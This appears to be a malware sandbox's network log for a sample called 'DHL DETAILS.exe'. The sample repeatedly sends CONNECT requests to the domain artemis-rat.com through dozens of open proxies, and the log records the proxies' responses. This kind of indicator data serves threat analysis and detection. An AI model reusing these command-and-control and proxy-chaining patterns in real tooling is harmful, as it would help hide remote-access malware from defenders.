Mar 9, 2024 13:14:19.224018097 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.724416971 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1197	192.168.2.5	53589	203.161.32.242	50640	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.658039093 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.130117893 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.724081039 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.724334002 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.833435059 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1198	192.168.2.5	51637	45.117.179.179	17827	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.658554077 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.703572035 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1199	192.168.2.5	53236	167.86.69.142	36394	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.665743113 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.723983049 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1200	192.168.2.5	51720	51.15.139.15	16379	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.687813044 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.703572035 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1201	192.168.2.5	51661	202.142.159.204	31026	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.691028118 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1202	192.168.2.5	53543	20.210.113.32	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.691502094 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.955601931 CET	314	IN	HTTP/1.1 403 Forbidden Server: squid Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:17 GMT Content-Type: text/html;charset=utf-8 Content-Length: 17 X-Squid-Error: ERR_ACCESS_DENIED 0 X-Cache: MISS from cdn-fintech.info X-Cache-Lookup: NONE from cdn-fintech.info:8123 Connection: close Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1203	192.168.2.5	53501	188.166.17.18	8881	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.691745996 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1204	192.168.2.5	53569	38.54.95.19	8060	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.694957018 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:19.918087006 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1205	192.168.2.5	53655	172.67.182.165	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.695816040 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.850866079 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:17 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1206	192.168.2.5	53656	104.19.247.62	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.696266890 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.851035118 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:17 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1207	192.168.2.5	53280	58.234.116.197	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.697402954 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.011396885 CET	166	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1208	192.168.2.5	53587	209.142.64.219	39789	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.701771021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.333340883 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.036691904 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.536640882 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1209	192.168.2.5	53717	8.219.135.23	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.705547094 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1210	192.168.2.5	53335	36.134.91.82	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.705869913 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.380187035 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.380136013 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1211	192.168.2.5	53719	8.219.135.23	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.707118034 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1212	192.168.2.5	53721	8.219.135.23	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.707808971 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1213	192.168.2.5	53723	8.219.135.23	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.708467960 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1214	192.168.2.5	53621	45.196.150.195	5432	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.709613085 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.928982019 CET	308	IN	HTTP/1.1 407 Proxy Authentication Required Server: FaaS v1.3-20220203-7fa38bd5af Date: Sat, 09 Mar 2024 12:14:17 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 65 Proxy-Authenticate: Basic realm="Proxy" Connection: close Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64 Data Ascii: HTTP authorization error: ip auth failed, no credentials provided

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1215	192.168.2.5	53274	80.67.8.6	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.711671114 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1216	192.168.2.5	53505	43.155.142.116	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.715804100 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1217	192.168.2.5	53273	94.30.152.172	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.717487097 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1218	192.168.2.5	51823	192.163.201.131	40886	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.725249052 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.833201885 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1219	192.168.2.5	53540	3.122.84.99	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.725368977 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.032854080 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:17 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1220	192.168.2.5	51713	67.227.186.23	57676	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.751034975 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.833148003 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1221	192.168.2.5	53509	60.190.68.154	7302	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.751419067 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:18.091655970 CET	90	IN	HTTP/1.1 200 OK Content-Type: application/json Connection: close Content-Length: 55

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1222	192.168.2.5	53558	54.38.179.162	56613	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.751451969 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1223	192.168.2.5	53532	202.162.219.10	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.775351048 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1224	192.168.2.5	53604	195.154.172.161	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.779618025 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1225	192.168.2.5	53559	47.122.45.221	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.785034895 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.135713100 CET	711	IN	HTTP/1.1 502 Bad Gateway Server: nginx/1.24.0 Date: Sat, 09 Mar 2024 12:14:17 GMT Content-Type: text/html Content-Length: 559 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.24.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1226	192.168.2.5	53570	8.213.128.90	6666	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.791341066 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1227	192.168.2.5	53500	38.54.116.9	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:17.791341066 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:20.198071003 CET	39	IN	HTTP/1.1 200 Connection established
Mar 9, 2024 13:14:22.251873970 CET	39	IN	HTTP/1.1 200 Connection established
Mar 9, 2024 13:14:24.847807884 CET	39	IN	HTTP/1.1 200 Connection established
Mar 9, 2024 13:14:29.711780071 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1228	192.168.2.5	53619	175.213.76.24	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

